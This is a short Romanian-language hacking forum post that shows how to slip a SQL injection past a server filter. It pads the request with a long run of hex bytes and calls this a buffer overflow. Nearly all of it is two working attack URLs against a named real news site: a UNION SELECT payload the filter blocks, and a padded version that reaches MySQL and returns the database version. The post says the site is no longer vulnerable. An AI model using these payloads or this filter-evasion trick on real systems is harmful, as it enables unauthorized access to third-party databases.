Jump to content
ZeroCold

SQL Injection filter bypass using Buffer Overflow

Recommended Posts

Posted

Acesta este un exemplu despre cum se poate evita filtru aplicat de server împotriva SQLi.

Cererea este blocat? de c?tre filtru:

http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 2) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Cererea trece de filtru ?i este executata de MySQL:

http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

##########################

Site-ul dat ca exemplu numai este vulnerabil.

Credite: tdxev

Sursa: aici.

  • Downvote 2

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...